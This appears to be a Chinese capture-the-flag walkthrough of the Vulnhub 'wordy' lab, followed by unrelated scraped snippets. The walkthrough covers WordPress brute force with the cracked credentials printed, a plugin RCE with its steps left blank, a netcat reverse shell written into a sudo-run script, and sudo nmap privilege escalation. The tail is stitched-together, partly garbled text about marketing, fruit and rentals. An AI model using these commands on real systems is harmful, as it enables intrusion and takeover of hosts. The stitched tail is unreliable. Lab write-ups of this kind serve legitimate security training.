Vulnhub提示:
扫描靶机IP地址:nmap -sP 192.168.10.0/24
扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129
开放端口22,80
访问80端口发现URL被重定向到wordy
我们需要在host文件中添加
文件位置 /etc/hosts
可以访问到啦
扫描下目录结构吧,
御剑扫描
发现是wordpress站点
使用WPscan扫描
一款专注于wordpress站点扫描工具
wpscan -url wordy
顺便枚举一下用户
站点没发现什么漏洞,暴力破解尝试下
root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt
破解很久没获取密码,这时候想起Vulnhub重要提示
root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用这个字典在尝试下暴力破解
root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt
获得密码
mark
helpdesk01
登录后台发现Activity on Wordy插件存在远程代码执行漏洞
利用远程代码执行命令漏洞步骤:
step1:打开burpsuite工具设置 ***
step2:
step3:发送到重写模块
step4:kali打开端口监听
step5:
利用成功获取到webshell
横向移动搜寻可以利用的信息
成功找到了graham的密码信息
查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本
如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell
echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh
kali 端监听 8888 端口
sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的
jens用户可以以 root权限执行 nmap nmap 提权分为两种
旧版本上以进入交互提权
# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh
新版本
echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF
如果说做抖音分为以下几个关键点,那分别是:内容是视频传播和涨粉的关键,数据是辅助优化高质量内容的核心利器,那技巧就是利用人工干预解决问题和助力推广以及优化各个场景的关键技能 正常来说身为运营人去做任何...
图片5和图片6给咱们介绍的是一切有关受感染服务器IP地址的整体概略信息。 侵略测验东西(Intruder),用于履行强壮的定制进犯去发现及运用不同寻常的缝隙;例如,在Linux指令行下:$ php -...
菠萝蜜为何要用盐小水泡(菠萝蜜为何都需要泡在食盐水里)一块新鮮的菠萝蜜,一碗咸度正好的食盐水,只需互相结合一会儿,拿出来咬一口,甘甜由舌头,渐渐地飘满全部口腔内部,每一丝体细胞都越来越甜滋滋。 ...
本文目录一览: 1、用C怎么编类似黑客帝国背景的那段程序? 2、用C语言编个像黑客帝国的那种的01数字瀑布 3、c语言黑客编程 4、用C语言怎么编写入侵程序,要要哪些基础? 5、二级C...
编辑导语:“长租公寓”,又名“白领公寓”、“只身合租公寓”,是房地产市场的新兴行业,即将业主衡宇租赁过来,举办装修改革,配齐家具家电,以单间的形式出租给需要人士。从2015年国度开始大力大举支持住房租...
精彩的广告词(十大优秀广告词) 1.如果多一次选择 你想变成谁? 不,这不是选择,而是对自己的怀疑。 我能经得住多大诋毁就能担得起多少赞美 如果忍耐算是坚强 我选择抵抗 如果妥协算是努力 我选择争取...